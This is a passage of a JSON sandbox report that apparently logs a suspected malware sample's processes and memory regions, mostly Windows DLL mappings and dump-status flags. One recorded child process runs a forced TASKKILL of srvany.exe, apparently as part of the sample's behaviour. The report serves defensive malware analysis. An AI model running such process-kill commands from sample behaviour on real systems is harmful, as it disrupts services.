"permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_4366", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:01:33.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9437184, "type": "region", "version": 1 }, "end_va": 9699327, "entry_point": 0, "filename": null, "id": "region_4367", "name": "private_0x0000000000900000", "norm_filename": null, "region_type": "private_memory", "start_va": 9437184, "timestamp": "00:01:33.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 10092544, "type": "region", "version": 1 }, "end_va": 11669503, "entry_point": 0, "filename": null, "id": "region_4368", "name": "pagefile_0x00000000009a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10092544, "timestamp": "00:01:33.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11730944, "type": "region", "version": 1 }, "end_va": 32702463, "entry_point": 0, "filename": null, "id": "region_4369", "name": "pagefile_0x0000000000b30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11730944, "timestamp": "00:01:33.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4370", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:33.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4371", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:33.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2297855, "entry_point": 0, "filename": null, "id": "region_4372", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:01:33.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958526975, "entry_point": 1958292296, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4373", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:33.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959043071, "entry_point": 1959007386, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4374", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:01:33.149", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_4375", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:33.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_4376", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:33.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1958739968, "type": "region", "version": 1 }, "end_va": 1958907903, "entry_point": 1958767385, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4377", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1958739968, "timestamp": "00:01:33.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8519680, "type": "region", "version": 1 }, "end_va": 8781823, "entry_point": 0, "filename": null, "id": "region_4378", "name": "private_0x0000000000820000", "norm_filename": null, "region_type": "private_memory", "start_va": 8519680, "timestamp": "00:01:33.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32702464, "type": "region", "version": 1 }, "end_va": 35647487, "entry_point": 32702464, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4379", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32702464, "timestamp": "00:01:33.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36044800, "type": "region", "version": 1 }, "end_va": 36306943, "entry_point": 0, "filename": null, "id": "region_4380", "name": "private_0x0000000002260000", "norm_filename": null, "region_type": "private_memory", "start_va": 36044800, "timestamp": "00:01:33.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4381", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:33.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4382", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:33.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4383", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:33.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4384", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:33.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_4385", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:01:33.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36831232, "type": "region", "version": 1 }, "end_va": 37093375, "entry_point": 0, "filename": null, "id": "region_4386", "name": "private_0x0000000002320000", "norm_filename": null, "region_type": "private_memory", "start_va": 36831232, "timestamp": "00:01:33.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37617664, "type": "region", "version": 1 }, "end_va": 37879807, "entry_point": 0, "filename": null, "id": "region_4387", "name": "private_0x00000000023e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37617664, "timestamp": "00:01:33.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38338560, "type": "region", "version": 1 }, "end_va": 38600703, "entry_point": 0, "filename": null, "id": "region_4388", "name": "private_0x0000000002490000", "norm_filename": null, "region_type": "private_memory", "start_va": 38338560, "timestamp": "00:01:33.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958674432, "type": "region", "version": 1 }, "end_va": 1958735871, "entry_point": 1958683040, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4389", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1958674432, "timestamp": "00:01:33.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4390", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:33.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4391", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:33.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1787297792, "type": "region", "version": 1 }, "end_va": 1787912191, "entry_point": 1787427001, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4392", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1787297792, "timestamp": "00:01:33.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958641663, "entry_point": 1958548277, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4393", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:01:33.221", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM srvany.exe /IM srvany.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_37", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 37, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4394", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:33.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4395", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:33.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4396", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:33.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4397", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:33.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4398", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:33.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_4399", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:33.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_4400", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:33.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 6643711, "entry_point": 6577289, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4401", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 6553600, "timestamp": "00:01:33.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4402", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:33.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4403", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:33.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4404", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:33.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4405", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:33.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4406", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:33.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4407", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:33.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4408", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:33.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4409", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:33.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4410", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:33.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_4411", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:33.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4412", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:33.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4413", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:33.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4414", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:33.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4415", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:33.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4416", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:33.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4417", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:33.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4418", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:33.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1273855, "entry_point": 851968, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4419", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:01:33.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 9240575, "entry_point": 0, "filename": null, "id": "region_4420", "name": "private_0x00000000007d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8192000, "timestamp": "00:01:33.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 11272192, "type": "region", "version": 1 }, "end_va": 11337727, "entry_point": 0, "filename": null, "id": "region_4421", "name": "private_0x0000000000ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11272192, "timestamp": "00:01:33.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787932671, "entry_point": 1786975182, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4422", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:33.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4423", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:33.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4424", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:33.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4425", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:33.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959063551, "entry_point": 1959006881, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4426", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:01:33.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959067648, "type": "region", "version": 